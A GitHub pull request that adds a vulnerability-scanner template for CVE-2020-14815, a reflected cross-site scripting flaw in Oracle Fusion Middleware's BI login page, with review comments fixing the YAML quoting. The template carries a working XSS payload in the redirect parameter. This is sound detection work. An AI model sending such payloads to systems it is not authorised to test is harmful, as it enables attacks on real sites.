### PR TITLE
Create CVE-2020-14815.yaml

### PR DESCRIPTION
**Pull request by mohammedshine**

### CODE REVIEW

**Comment by mohammedshine** [comment]
Do fix the  issue, Thanks

File: cves/CVE-2020-14815.yaml [hunk 1]
```diff
@@ -0,0 +1,20 @@
+id: CVE-2020-14815
+
+info:
+  name:  Oracle Fusion Middleware XSS
```
Comment (dwisiswant0) [inline cves/CVE-2020-14815.yaml:4]:
```diff
-  name:  Oracle Fusion Middleware XSS
+  name: Oracle Fusion Middleware XSS
```

File: cves/CVE-2020-14815.yaml [hunk 2]
```diff
@@ -0,0 +1,20 @@
...
+  author: Shine
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><svg/onload=alert(1)>
```
Comment (dwisiswant0) [inline cves/CVE-2020-14815.yaml:11]:
```diff
-      - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect="><svg/onload=alert(1)>
+      - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=\"><svg/onload=alert(1)>"
```

**Comment by geeknik** [comment]
`">` also works as per the original finder of CVE-2020-14815. https://twitter.com/HackerOn2Wheels/status/1326927875279380480

**Pull request merged**